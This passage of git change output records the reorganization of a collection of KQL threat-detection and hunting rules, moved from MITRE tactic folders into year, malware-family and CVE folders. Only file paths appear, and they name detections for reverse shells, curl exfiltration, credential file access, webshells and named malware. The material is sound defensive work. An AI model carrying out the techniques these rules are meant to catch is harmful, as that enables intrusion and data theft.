2023/Malware/DarkGate}/darkgate_user_created_via_net_exe.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/Griffon}/griffon_malware_attack_pattern.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2023/Malware/GuLoader}/injected_browser_process_spawning_rundll32_guloader_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 
2023/Malware/IcedID}/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Pikabot}/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2023/Malware/Pikabot}/potential_pikabot_c2_activity.kql (100%) rename KQL/rules-emerging-threats/{Discovery => 2023/Malware/Pikabot}/potential_pikabot_discovery_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2023/Malware/Pikabot}/potential_pikabot_hollowing_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Pikabot}/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Qakbot}/potential_qakbot_rundll32_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Qakbot}/qakbot_regsvr32_calc_pattern.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Qakbot}/qakbot_rundll32_exports_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Qakbot}/qakbot_rundll32_fake_dll_extension_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/Qakbot}/qakbot_uninstaller_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Rhadamanthys}/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/Rorschach}/rorschach_ransomware_execution_activity.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/SNAKE}/potential_encrypted_registry_blob_related_to_snake_malware.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/potential_snake_malware_installation_binary_indicator.kql (100%) rename KQL/rules-emerging-threats/{Execution => 
2023/Malware/SNAKE}/potential_snake_malware_installation_cli_arguments_indicator.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/potential_snake_malware_persistence_service_execution.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/SNAKE}/snake_malware_covert_store_registry_key.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/snake_malware_installer_name_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/snake_malware_kernel_driver_file_indicator.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/snake_malware_werfault_persistence_file_creation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/Ursnif}/ursnif_redirection_of_discovery_commands.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/3CX-Supply-Chain}/malicious_dll_load_by_compromised_3cxdesktopapp.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2023/TA/3CX-Supply-Chain}/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/3CX-Supply-Chain}/potential_compromised_3cxdesktopapp_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/3CX-Supply-Chain}/potential_compromised_3cxdesktopapp_update_activity.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2023/TA/3CX-Supply-Chain}/potential_suspicious_child_process_of_3cxdesktopapp.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/Cozy-Bear}/dll_names_used_by_svr_for_graphicalproton_backdoor.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/Diamond-Sleet}/diamond_sleet_apt_dll_sideloading_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Diamond-Sleet}/diamond_sleet_apt_file_creation_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 
2023/TA/Diamond-Sleet}/diamond_sleet_apt_process_activity_indicators.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/Diamond-Sleet}/diamond_sleet_apt_scheduled_task_creation_registry.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/FIN7}/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/FIN7}/potential_apt_fin7_related_powershell_script_created.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Lace-Tempest}/lace_tempest_cobalt_strike_download.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Lace-Tempest}/lace_tempest_file_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Lace-Tempest}/lace_tempest_malware_loader_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/Lazarus}/lazarus_apt_dll_sideloading_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Mint-Sandstorm}/mint_sandstorm_asperafaspex_suspicious_process_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Mint-Sandstorm}/mint_sandstorm_log4j_wstomcat_process_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Mint-Sandstorm}/mint_sandstorm_manageengine_suspicious_process_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Mustang-Panda-Australia-Campaign}/potential_apt_mustang_panda_activity_against_australian_gov.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Onyx-Sleet}/onyx_sleet_apt_file_creation_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/PaperCut-Print-Management-Exploitation}/papercut_mf_ng_exploitation_related_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/PaperCut-Print-Management-Exploitation}/papercut_mf_ng_potential_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 
2023/TA/Peach-Sandstorm}/peach_sandstorm_apt_process_activity_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_barracuda_esg_exploitation_indicators.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_download_compressed_files_from_temp_sh_using_wget.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_email_exfiltration_file_pattern.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_potential_seaspy_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_ssl_certificate_exfiltration_via_openssl.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2024/Exploits/CVE-2024-1708}/cve_2024_1708_screenconnect_path_traversal_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2024/Exploits/CVE-2024-1709}/screenconnect_user_database_modification.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Exploits/CVE-2024-3094}/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Exploits/CVE-2024-3400}/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/Exploits/CVE-2024-35250}/potential_cve_2024_35250_exploitation_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Exploits/CVE-2024-37085}/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql (100%) 
rename KQL/rules-emerging-threats/{Initial Access => 2024/Exploits/CVE-2024-50623}/cve_2024_50623_exploitation_attempt_cleo.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2024/Malware/CSharp-Streamer}/potential_csharp_streamer_rat_loading_net_executable_image.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Malware/DarkGate}/darkgate_drop_darkgate_loader_in_c_temp_directory.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Malware/Generic}/file_creation_related_to_rat_clients.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Malware/KamiKakaBot}/potential_kamikakabot_activity_lure_document_execution.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2024/Malware/KamiKakaBot}/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/Malware/KamiKakaBot}/potential_kamikakabot_activity_winlogon_shell_persistence.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/Malware/Lummac-Stealer}/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/Malware/Raspberry-Robin}/potential_raspberry_robin_cpl_execution_activity.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2024/Malware/Raspberry-Robin}/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/Malware/kapeka}/kapeka_backdoor_autorun_persistence.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2024/Malware/kapeka}/kapeka_backdoor_configuration_persistence.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/Malware/kapeka}/kapeka_backdoor_execution_via_rundll32_exe.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/Malware/kapeka}/kapeka_backdoor_loaded_via_rundll32_exe.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation 
=> 2024/Malware/kapeka}/kapeka_backdoor_persistence_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/Malware/kapeka}/potential_kapeka_decrypted_backdoor_indicator.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2024/TA/FIN7}/potential_apt_fin7_exploitation_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/TA/Forest-Blizzard}/forest_blizzard_apt_custom_protocol_handler_creation.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2024/TA/Forest-Blizzard}/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/TA/Forest-Blizzard}/forest_blizzard_apt_file_creation_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/TA/Forest-Blizzard}/forest_blizzard_apt_javascript_constrained_file_creation.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/TA/Forest-Blizzard}/forest_blizzard_apt_process_creation_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2024/TA/SlashAndGrab-Exploitation-In-Wild}/screenconnect_slashandgrab_exploitation_indicators.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2025/Exploits/CVE-2025-10035}/potential_exploitation_of_goanywhere_mft_vulnerability.kql (100%) rename KQL/rules-emerging-threats/{Credential Access => 2025/Exploits/CVE-2025-24054}/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2025/Exploits/CVE-2025-30406}/suspicious_process_spawned_by_centrestack_portal_apppool.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2025/Exploits/CVE-2025-31161}/suspicious_crushftp_child_process.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2025/Exploits/CVE-2025-31324}/potential_sap_netweaver_webshell_creation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 
2025/Exploits/CVE-2025-31324}/potential_sap_netweaver_webshell_creation_linux.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2025/Exploits/CVE-2025-32463}/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2025/Exploits/CVE-2025-33053}/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2025/Exploits/CVE-2025-49144}/potential_notepad_cve_2025_49144_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2025/Exploits/CVE-2025-53770}/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2025/Exploits/CVE-2025-53770}/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2025/Exploits/CVE-2025-54309}/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2025/Exploits/CVE-2025-57788}/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2025/Exploits/CVE-2025-57790}/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2025/Exploits/CVE-2025-57791}/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2025/Exploits/CVE-2025-59287}/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql (100%) create mode 100644 KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql create mode 100644 KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql create mode 100644 
KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql rename KQL/rules-emerging-threats/{Execution => 2025/Malware/Katz-Stealer}/katz_stealer_dll_loaded.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2025/Malware/Shai-Hulud}/shai_hulud_malicious_github_workflow_creation.kql (100%) rename KQL/rules-emerging-threats/{Exfiltration => 2025/Malware/Shai-Hulud}/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql (100%) rename KQL/rules-emerging-threats/{Impact => 2025/Malware}/funklocker_ransomware_file_creation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2025/Malware}/kalambur_backdoor_curl_tor_socks_proxy_execution.kql (100%) delete mode 100644 KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql create mode 100644 KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql rename KQL/rules-threat-hunting/{Execution => linux/file/file_event}/python_path_configuration_file_creation_linux.kql (100%) rename KQL/rules-threat-hunting/{Discovery => linux/process_creation}/process_discovery.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => linux/process_creation}/terminate_linux_process_via_kill.kql (100%) rename KQL/rules-threat-hunting/{Execution => macos/file/file_event}/python_path_configuration_file_creation_macos.kql (100%) rename KQL/rules-threat-hunting/{Collection => macos/process_creation}/clipboard_data_collection_via_pbpaste.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/file/file_access}/access_to_browser_credential_files_by_uncommon_applications.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/file/file_access}/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/file/file_access}/access_to_reg_hive_files_by_uncommon_applications.kql (100%) rename KQL/rules-threat-hunting/{Credential 
Access => windows/file/file_access}/access_to_sysvol_policies_share_by_uncommon_process.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/file/file_access}/access_to_windows_outlook_mail_files_by_uncommon_applications.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/file/file_access}/unattend_xml_file_access_attempt.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/file/file_delete}/ads_zone_identifier_deleted.kql (100%) rename KQL/rules-threat-hunting/{Resource Development => windows/file/file_event}/creation_of_an_executable_by_an_executable.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/file/file_event}/dmp_hdmp_file_creation.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/file/file_event}/pfx_file_creation.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/file/file_event}/python_path_configuration_file_creation_windows.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/file/file_event}/scheduled_task_created_filecreation.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/file/file_event}/vscode_code_tunnel_execution_file_indicator.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/file/file_event}/wdac_policy_file_creation_in_codeintegrity_folder.kql (100%) rename KQL/rules-threat-hunting/{Initial Access => windows/file/file_event}/webdav_temporary_local_file_creation.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/image_load}/amsi_dll_load_by_uncommon_process.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/image_load}/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/image_load}/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/image_load}/microsoft_excel_add_in_loaded.kql (100%) 
rename KQL/rules-threat-hunting/{Execution => windows/image_load}/microsoft_word_add_in_loaded.kql (100%) rename KQL/rules-threat-hunting/{Collection => windows/image_load}/system_drawing_dll_load.kql (100%) rename KQL/rules-threat-hunting/{Persistence => windows/image_load}/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/image_load}/wmi_module_loaded_by_uncommon_process.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/network_connection}/dfsvc_exe_network_connection_to_non_local_ips.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/network_connection}/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/network_connection}/hh_exe_initiated_http_network_connection.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/network_connection}/msiexec_exe_initiated_network_connection_over_http.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/network_connection}/network_connection_initiated_by_powershell_process.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/network_connection}/network_connection_initiated_from_users_public_folder.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/network_connection}/potentially_suspicious_azure_front_door_connection.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/arbitrary_command_execution_using_wsl.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/cab_file_extraction_via_wusa_exe.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/clickonce_deployment_execution_dfsvc_exe_child_process.kql (100%) rename KQL/rules-threat-hunting/{Discovery => windows/process_creation}/cmd_shell_output_redirect.kql (100%) rename 
KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/codepage_modification_via_mode_com.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/process_creation}/curl_exe_execution.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/process_creation}/curl_exe_execution_with_custom_useragent.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/diskshadow_child_process_spawned.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/diskshadow_script_mode_execution.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/dll_call_by_ordinal_via_rundll32_exe.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/dynamic_net_compilation_via_csc_exe_hunting.kql (100%) rename KQL/rules-threat-hunting/{Privilege Escalation => windows/process_creation}/elevated_system_shell_spawned.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/process_creation}/eventlog_query_requests_by_builtin_utilities.kql (100%) rename KQL/rules-threat-hunting/{Persistence => windows/process_creation}/execution_from_webserver_root_folder.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/process_creation}/file_download_via_curl_exe.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/file_or_folder_permissions_modifications.kql (100%) rename KQL/rules-threat-hunting/{Exfiltration => windows/process_creation}/ftp_connection_open_attempt_via_winscp_cli.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/headless_process_launched_via_conhost_exe.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/import_new_module_via_powershell_commandline.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => 
windows/process_creation}/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/manual_execution_of_script_inside_of_a_compressed_file.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/microsoft_workflow_compiler_execution.kql (100%) rename KQL/rules-threat-hunting/{Discovery => windows/process_creation}/net_exe_execution.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/new_self_extracting_package_created_via_iexpress_exe.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql (100%) rename KQL/rules-threat-hunting/{Collection => windows/process_creation}/password_protected_compressed_file_extraction_via_7zip.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/potential_boinc_software_execution_uc_berkeley_signature_.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/potential_commandline_obfuscation_using_unicode_characters.kql (100%) rename KQL/rules-threat-hunting/{Exfiltration => windows/process_creation}/potential_data_exfiltration_via_curl_exe.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/potential_dll_sideloading_activity_via_extexport_exe.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/potential_file_override_append_via_set_command.kql (100%) rename KQL/rules-threat-hunting/{Credential Access => windows/process_creation}/potential_password_reconnaissance_via_findstr_exe.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/potential_proxy_execution_via_explorer_exe_from_shell_process.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => 
windows/process_creation}/potential_suspicious_execution_from_guid_like_folder_names.kql (100%) rename KQL/rules-threat-hunting/{Collection => windows/process_creation}/potentially_suspicious_compression_tool_parameters.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/potentially_suspicious_powershell_child_processes.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/process_execution_from_webdav_share.kql (100%) rename KQL/rules-threat-hunting/{Impact => windows/process_creation}/process_terminated_via_taskkill.kql (100%) rename KQL/rules-threat-hunting/{Command and Control => windows/process_creation}/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/remote_access_tool_ammy_admin_agent_execution.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/remote_access_tool_cmd_exe_execution_via_anyviewer.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/remote_access_tool_screenconnect_remote_command_execution_hunting.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql (100%) rename KQL/rules-threat-hunting/{Discovery => windows/process_creation}/sc_exe_query_execution.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/scheduled_task_creation_from_potential_suspicious_parent_location.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/set_files_as_system_files_using_attrib_exe.kql (100%) rename KQL/rules-threat-hunting/{Lateral Movement => windows/process_creation}/smb_over_quic_via_net_exe.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/suspicious_new_instance_of_an_office_com_object.kql (100%) rename 
KQL/rules-threat-hunting/{Discovery => windows/process_creation}/suspicious_tasklist_discovery_command.kql (100%) rename KQL/rules-threat-hunting/{Discovery => windows/process_creation}/system_information_discovery_via_wmic_exe.kql (100%) rename KQL/rules-threat-hunting/{Exfiltration => windows/process_creation}/tunneling_tool_execution.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/unusually_long_powershell_commandline.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/process_creation}/use_short_name_path_in_command_line.kql (100%) rename KQL/rules-threat-hunting/{Exfiltration => windows/process_creation}/winscp_execution_from_non_standard_folder.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/process_creation}/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/registry/registry_event}/scheduled_task_created_registry.kql (100%) rename KQL/rules-threat-hunting/{Execution => windows/registry/registry_set}/command_executed_via_run_dialog_box_registry.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/registry/registry_set}/microsoft_office_trusted_location_updated.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/registry/registry_set}/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql (100%) rename KQL/rules-threat-hunting/{Defense Evasion => windows/registry/registry_set}/service_binary_in_user_controlled_folder.kql (100%) rename KQL/rules-threat-hunting/{Persistence => windows/registry/registry_set}/shell_context_menu_command_tampering.kql (100%) delete mode 100644 KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql delete mode 100644 KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql delete mode 100644 KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql delete mode 
100644 KQL/rules/Discovery/pua_adfind_suspicious_execution.kql delete mode 100644 KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql delete mode 100644 KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql delete mode 100644 KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql delete mode 100644 KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql delete mode 100644 KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql rename KQL/rules/{Defense Evasion => linux/file_event}/linux_doas_conf_file_creation.kql (100%) rename KQL/rules/{Privilege Escalation => linux/file_event}/persistence_via_cron_files.kql (100%) rename KQL/rules/{Privilege Escalation => linux/file_event}/persistence_via_sudoers_files.kql (100%) rename KQL/rules/{Persistence => linux/file_event}/potentially_suspicious_shell_script_creation_in_profile_folder.kql (100%) create mode 100644 KQL/rules/linux/file_event/suspicious_filename_with_embedded_base64_commands.kql rename KQL/rules/{Defense Evasion => linux/file_event}/triple_cross_ebpf_rootkit_default_lockfile.kql (100%) rename KQL/rules/{Privilege Escalation => linux/file_event}/triple_cross_ebpf_rootkit_default_persistence.kql (100%) rename KQL/rules/{Command and Control => linux/file_event}/wget_creating_files_in_tmp_directory.kql (100%) rename KQL/rules/{Command and Control => linux/network_connection}/communication_to_localtonet_tunneling_service_initiated_linux.kql (100%) rename KQL/rules/{Exfiltration => linux/network_connection}/communication_to_ngrok_tunneling_service_linux.kql (100%) rename KQL/rules/{Impact => linux/network_connection}/linux_crypto_mining_pool_connections.kql (100%) rename KQL/rules/{Execution => linux/network_connection}/linux_reverse_shell_indicator.kql (100%) rename KQL/rules/{Persistence => 
linux/network_connection}/potentially_suspicious_malware_callback_communication_linux.kql (100%) rename KQL/rules/{Reconnaissance => linux/process_creation}/access_of_sudoers_file_content.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/audit_rules_deleted_via_auditctl.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/bash_interactive_shell.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/bpftrace_unsafe_option_usage.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/capabilities_discovery_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/capsh_shell_invocation_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/chmod_suspicious_directory.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/clear_linux_logs.kql (100%) rename KQL/rules/{Collection => linux/process_creation}/clipboard_collection_with_xclip_tool.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/connection_proxy.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/container_residence_discovery_via_proc_virtual_fs.kql (100%) rename KQL/rules/{Credential Access => linux/process_creation}/copy_passwd_or_shadow_from_tmp_path.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/crontab_enumeration.kql (100%) rename KQL/rules/{Command and Control => linux/process_creation}/curl_usage_on_linux.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/dd_file_overwrite.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/decode_base64_encoded_text.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/disable_or_stop_services.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/disabling_security_tools.kql (100%) rename 